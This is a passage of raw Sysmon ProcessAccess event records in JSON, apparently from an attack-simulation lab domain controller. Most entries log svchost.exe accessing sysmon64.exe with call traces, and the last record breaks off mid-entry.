C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5589,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5590,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5591,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5592,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5593,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5594,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5595,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5596,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010AA2F0800}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 